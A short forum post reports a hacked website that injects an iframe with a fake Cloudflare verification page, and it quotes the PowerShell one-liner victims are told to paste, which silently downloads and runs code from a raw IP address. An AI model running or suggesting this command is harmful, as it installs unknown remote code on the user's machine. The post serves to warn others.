A company my wife works with had their site hacked and the hackers are injecting an iframe hosted on glcouds.icu and it looks like this:
cloudflare.png
If you follow the command, it runs this in Powershell
powershell -w h -nop -c iex(iwr -Uri 93.152.230.54 -UseBasicParsing)
I did not bother to see what gets downloaded from that IP
No surprise, it's been around for a while, but I had never seen it
Here's a reddit thread from 6mos ago
https://www.reddit.com/r/CloudFlare/comments/1jog7et/fake_cloudflare_verification_page_almost_fell_for/
It's kind of a genius hack since more and more Cloudflare verification = "secure" so why not just follow the instructions and insert random code into Powershell?
>genius
Pretty damn slick.